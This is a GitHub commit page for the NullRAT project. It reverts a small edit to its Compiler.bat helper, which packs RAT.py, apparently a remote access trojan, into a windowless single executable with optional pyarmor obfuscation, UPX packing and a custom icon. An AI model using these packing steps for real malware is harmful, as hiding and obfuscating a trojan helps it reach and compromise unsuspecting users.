Skip to content

Commit

Permalink
Revert "Use python -m suffix"
Browse files Browse the repository at this point in the history
  • Loading branch information
NullCode1337 authored Apr 25, 2022
1 parent 97c8204 commit 5886295
Showing 1 changed file with 4 additions and 4 deletions.
8 changes: 4 additions & 4 deletions NullRAT-Helpers/Compiler.bat
Original file line number Diff line number Diff line change
Expand Up @@ -60,15 +60,15 @@ if %upxdd%==yes (set path=%path%;%~dp0NullRAT\upx)

if %pyarmor%==yes (
if %icon%==yes (
python -m pyarmor pack -e " --onefile --noconsole --icon=custom_icon.ico " RAT.py
pyarmor pack -e " --onefile --noconsole --icon=custom_icon.ico " RAT.py
) else (
python -m pyarmor pack -e " --onefile --noconsole " RAT.py
pyarmor pack -e " --onefile --noconsole " RAT.py
)
) else (
if %icon%==yes (
python -m pyinstaller --onefile --noconsole --icon=custom_icon.ico RAT.py
pyinstaller --onefile --noconsole --icon=custom_icon.ico RAT.py
) else (
python -m pyinstaller --onefile --noconsole RAT.py
pyinstaller --onefile --noconsole RAT.py
)
)

Expand Down

0 comments on commit 5886295

Please sign in to comment.